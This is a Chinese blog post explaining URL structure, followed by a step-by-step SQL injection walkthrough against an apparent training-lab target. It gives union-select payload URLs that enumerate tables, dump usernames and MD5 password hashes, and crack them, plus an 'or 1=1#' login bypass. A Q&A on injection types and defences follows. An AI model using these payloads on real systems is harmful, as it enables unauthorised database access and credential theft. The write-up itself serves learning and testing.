URL详解和渗透之SQL注入

渗透之SQL注入等相关知识整理

         WEB注入,就是在网页中寻找相应得注点,如在页头、logo、栏目页、超链接等。当找到相应的注点,接下来就是进入数据库判断登录密码等获取对应的权限,想要完场这些,首先要弄懂的是URL链接语法,下面就是HTTP网页的URL的详细介绍:
1. HTTP网页URL链接语法介绍
HTTP简介:
         HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 视频、JS效果等)。
         HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信息系统。
         HTTP协议工作于客户端-服务端架构为上。浏览器作为HTTP客户端通过URL向HTTP服务端即WEB服务器发送所有请求。Web服务器根据接收到的请求后,向客户端发送响应信息。
         HTTP使用统一资源标识符(Uniform Resource Identifiers, URI)来传输数据和建立连接。URL是一种特殊类型的URI,包含了用于查找某个资源的足够的信息
URL,全称是UniformResourceLocator, 中文叫统一资源定位符,是互联网上用来标识某一处资源的地址。以下面这个URL为例,介绍下普通URL的各部分组成:
URL简介:
URL所包含的部分:
如:https://editor.csdn.net/md?not_checkout=1&articleId=110792100在这里插入图片描述

1.协议:该URL的协议为“http:”,这代表网页使用的是HTTP协议。在Internet中可以使用多种协议,如HTTP,FTP等等本例中使用的是HTTP协议。在"HTTP"后面的“//”为分隔符
例子:file 资源是本地计算机上的文件。格式file:///,注意后边应是三个斜杠。
ftp 通过 FTP访问资源。格式 FTP://
gopher 通过 Gopher 协议访问该资源。
http 通过 HTTP 访问该资源。 格式 HTTP://
https 通过安全的 HTTPS 访问该资源。 格式 HTTPS://
mailto 资源为电子邮件地址,通过 SMTP 访问。 格式 mailto:
MMS 通过 支持MMS(流媒体)协议的播放该资源。(代表软件:Windows Media Player)格式 MMS://
ed2k 通过 支持ed2k(专用下载链接)协议的P2P软件访问该资源。(代表软件:电驴) 格式 ed2k://
Flashget 通过 支持Flashget:(专用下载链接)协议的P2P软件访问该资源。(代表软件:快车) 格式 Flashget://
thunder 通过 支持thunder(专用下载链接)协议的P2P软件访问该资源。(代表软件:迅雷) 格式 thunder://
news 通过 NNTP 访问该资源。
2.域名或主机:URL的域名部分为“editor.csdn.net”。一个URL中,也可以使用IP地址作为域名使用,有时,在主机名前也可以包含连接到服务器所需的用户名和密码(格式:username:password@hostname)
用户名和密码:很多服务器都要求输入用户名和密码才会允许用户访问数据,如FTP服务器。
例子:ftp://joe:joepasswd@ftp.prep.edu/pub/name
joe是用户名、joepasswd是密码
3.端口部分:跟在域名后面的是端口,域名和端口之间使用“:”作为分隔符。端口不是一个URL必须的部分,如果省略端口部分,将采用默认端口
例子:很多HTTP的默认端口号是80。比如,130.32.12.34:800,这里的IP地址是主机名,端口是800
4.虚拟目录部分:从域名后的第一个“/”开始到最后一个“/”为止,是虚拟目录部分。虚拟目录也不是一个URL必须的部分。
5.文件名部分:从域名后的最后一个“/”开始到“?”为止,是文件名部分,如果没有“?”,则是从域名后的最后一个“/”开始到“#”为止,是文件部分,如果没有“?”和“#”,那么从域名后的最后一个“/”开始到结束,都是文件名部分。
例子:本例中的文件名是“md”。文件名部分也不是一个URL必须的部分,如果省略该部分,则使用默认的文件名index.htm
6.锚部分:从“#”开始到最后,都是锚部分。
7.参数部分:从“?”开始到“#”为止之间的部分为参数部分,又称搜索部分、查询部分。
2. SQL注入
1、SQL注入步骤
a)寻找注入点,构造特殊的语句
传入SQL语句可控参数分为两类

  1. 数字类型,参数不用被引号括起来,如?id=1
  2. 其他类型,参数要被引号扩起来,如?name=“phone”
    b)用户构造SQL语句(如:‘or 1=1#;admin’#(这个注入又称PHP的万能密码,是已知用户名的情况下,可绕过输入密码)以后再做解释)
    c)将SQL语句发送给DBMS数据库
    d)DBMS收到返回的结果,并将该请求解释成机器代码指令,执行必要得到操作
    e)DBMS接受返回结果,处理后,返回给用户
    因为用户构造了特殊的SQL语句,必定返回特殊的结果(只要你的SQL语句够灵活)
    SQL手工注入
    寻找注入点
    由于平台上只有一个链接并且该链接有?id=1—基本判定为注入点
    尝试注入 and 1=1 and 1=2
    1=1无报错 1=2有报错 确认此处有SQL注入漏洞

查找闭合方式
http://219.153.49.228:48091/new_list.php?id=1 #
http://219.153.49.228:48091/new_list.php?id=1 --+
发现无报错,确认该注入点没有闭合方式

使用order by 查询该表有几个字段
http://219.153.49.228:48091/new_list.php?id=1 order by 1
http://219.153.49.228:48091/new_list.php?id=1 order by 2
http://219.153.49.228:48091/new_list.php?id=1 order by 3
http://219.153.49.228:48091/new_list.php?id=1 order by 4
http://219.153.49.228:48091/new_list.php?id=1 order by 5 #报错 说明该表有4个字段

使用union查询显注点(将id=-1 使它永远为假,避免影响select 1,2,3,4)
http://219.153.49.228:48091/new_list.php?id=-1 union select 1,2,3,4
发现2,3为显注点

查询数据库和数据库版本(将2,3替换成相对应的语句)
http://219.153.49.228:48091/new_list.php?id=-1 union select 1,database(),@@datadir,4得到当前的数据库为mozhe_Discuz_StormGroup,数据库版本为5.7.22-0ubuntu0.16.04.1,
分析得到 操作系统:ubuntu 16.04.1,数据库:mysql5.7.22

查询mysql元数据库存放的所有的表
http://219.153.49.228:48091/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema= ‘mozhe_Discuz_StormGroup’
得到表StormGroup_member,notice

查询mysql元数据库StormGroup_member表中存放的所有的字段
http://219.153.49.228:48091/new_list.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘StormGroup_member’
得到该表的所有字段id,name,password,status

查询可疑字段的值—StormGroup_member----name password
http://219.153.49.228:48091/new_list.php?id=-1 union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到账号和md5加密后的值
mozhe:356f589a7df439f6f744ff19bb8092c0,mozhe:a719f0335ba451bd34e50b2b96dd6909
cmd5.com解密得到mozhe:dscan13 mozhe:458428
一一爆出得到KEY

1.进入滚动条处尝试注入

2.输入?id=1 and 1=1/1=2 发现存在注入点

3.使用order by查询字段数,字段数为4

4.输入?id=1 and 1=2 union select 1,2,3,4。发现回显位置为2,3

5.输入?id=1 and 1=2 union select 1,database(),3,4爆出数据库,得到数据库为mozhe_Discuz_StormGroup

6.输入?id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database()得到表StormGroup_member,notice

7.输入?id=1 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name = “StormGroup_member” 得到字段id,name,password,status

8.脱库union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

9.发现用户mozhe,mozhe,密码为md5加密,解密获得密码,第一个用户无法登录,另一个可以

10.登录后成功获得key

  • 5
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: SQL注入是目前最常见的Web攻击之一,因此在渗透测试面试时通常会涉及到与SQL注入有关的面试题。以下是一些常见的SQL注入面试题及相应的详解: 1. 什么是SQL注入?如何防止SQL注入? 答:SQL注入是一种针对Web应用程序的攻击方式。攻击者注入恶意的SQL语句,从而窃取、插入或修改数据库中的数据。要防止SQL注入,可以采取如下措施: - 对用户输入的数据进行过滤和验证,确保它们符合预期的格式和类型 - 使用参数化查询和存储过程等方式代替直接拼接SQL语句 - 对web应用程序进行安全漏洞扫描,及时发现和修补漏洞 2. 什么是盲注SQL注入?如何进行盲注SQL注入? 答:盲注SQL注入是一种在没有错误消息或其他明显迹象的情况下,通过试错法从数据库中提取信息。攻击者可以使用sleep语句、条件注释等方法判断任意条件的真假,并根据返回结果推测网站数据库的结构及内容。盲注SQL注入的主要方法包括布尔盲注、时间盲注和联合查询盲注。 3. 什么是堆叠查询SQL注入?如何进行堆叠查询SQL注入? 答:堆叠查询SQL注入是一种通过在SQL查询中嵌入多条查询语句来获取数据的攻击方式。攻击者可以利用堆叠查询,以执行任意的SQL代码,例如添加或删除表、更改或删除数据等。堆叠查询的主要方式包括分号分割、UNION注入、SELECT INTO OUTFILE等。 4. 什么是错误基于的SQL注入?如何进行错误基于的SQL注入? 答:错误基于的SQL注入是一种利用错误消息披露SQL语句结构的攻击方式。攻击者可以通过对错误消息进行分析,推测SQL语句的结构,并在此基础上进行注入攻击。错误基于的SQL注入的主要方式包括布尔型错误注入和基于时间的错误注入。 总之,SQL注入是非常常见的Web攻击方式,渗透测试人员需要充分掌握SQL注入的攻击方法和防御措施,以便在面试和实际测试中有效地识别和利用SQL注入漏洞。 ### 回答2: 作为一个渗透测试人员,SQL注入是我们需要掌握的核心技能之一。它是常用的攻击方式,可以通过注入恶意SQL代码来绕过应用程序的验证,进而获取或修改数据库中的敏感信息。 下面从常见的SQL注入相关面试题入手,介绍SQL注入的基本原理和应对方法。 1. 什么是SQL注入SQL注入是一种针对Web应用程序的攻击方式,攻击者通过在应用程序中插入恶意SQL语句,从而能够绕过身份验证和授权控制,进而访问或修改数据库中的敏感数据。 2. SQL注入的原理是什么? SQL注入原理是基于应用程序对数据库的查询、更新等操作没有经过正确的参数过滤和验证,攻击者利用这一漏洞向数据库服务器发送恶意SQL语句,以此来获取或篡改数据库中的数据。 例如:一个简单的登录页面,它可以使用以下SQL查询用户信息: SELECT * FROM users WHERE username = '$username' AND password = '$password' 如果应用程序没有对$usernam进行过滤和验证,攻击者可以在用户名输入框中注入恶意SQL代码,让查询语句变成这样: SELECT * FROM users WHERE username='admin';-- AND password='$password'; 攻击者通过输入"admin';--"来把后面的AND password='$password'注释掉,从而成功的登录进去。 3. 如何防范SQL注入? 为了防范SQL注入攻击,我们需要从以下几个方面来提高应用程序的安全性: 3.1 输入过滤和验证 对于所有的输入数据,包括表单字段、Cookie、HTTP请求参数和参数等,都需要进行严格的过滤和验证,可以使用正则表达式、白名单和黑名单来屏蔽一些特殊字符和SQL保留关键字,比如单引号、双引号、注释、and或or等。 3.2 参数化查询 参数化查询是一种应对SQL注入攻击的常用方法,它可以把SQL语句和输入变量分开,在执行查询时把输入变量映射为SQL参数,这样可以避免输入数据被误认为SQL命令。 3.3 最小权限原则 在设计数据库账号时需要遵循最小权限原则,即最小限度地给予每个用户或程序所需的权限,以此来限制不必要的数据泄漏,同时避免过多授权带来的数据遭到破坏的风险。 综上所述,SQL注入是一种严重的Web安全威胁,可以通过输入过滤和验证、参数化查询和最小权限原则等措施全面提高应用程序的安全性,防范SQL注入攻击。 ### 回答3: SQL注入渗透测试中最常见的一个攻击方式,通过注入恶意代码,使得应用程序在执行SQL查询时发生异常,从而达到获取敏感数据、控制数据甚至服务器的目的。在渗透测试面试中,SQL注入相关的面试题是必不可少的内容。下面将会介绍一些常见的SQL注入相关的面试题及详解。 1. 什么是SQL注入SQL注入是利用某些系统缺陷,在程序或应用中加入恶意代码,从而攻击数据库的行为。通常情况下,web应用程序的SQL语句中使用了用户提供的参数,攻击者可以通过构造特殊查询语句,将恶意代码注入到SQL语句中,进而执行非法操作。 2. SQL注入分类有哪几种? SQL注入可以分为两种基本形式:基于错误的注入和基于盲目的注入。基于错误的注入可以通过应用程序返回的错误信息来了解应用程序的数据库结构。基于盲目的注入与此相反,攻击者只能靠猜测构造攻击语句。 3. SQL注入的危害是什么? SQL注入的危害非常大,攻击者可以通过注入攻击代码来查询、篡改和删除数据库中的数据,从而窃取用户的敏感信息、提权甚至完全控制网站服务器。 4. SQL注入检测方法有哪些? 常见的SQL注入检测方法有:基于错误的注入检测方法、基于时间的注入检测方法、基于布尔值的注入检测方法和基于重量级注入检测方法等。 5. 如何预防SQL注入? 预防SQL注入的方法主要有以下几个方面:合理的输入验证、使用过滤器、使用参数化查询、限制数据库权限以及升级数据库软件等。 以上是SQL注入相关面试题及详解渗透测试面试中的SQL注入相关的问题非常重要,只有对于这些问题有深入的掌握和理解,才能成为一名出色的渗透测试工程师。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

萧@柯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值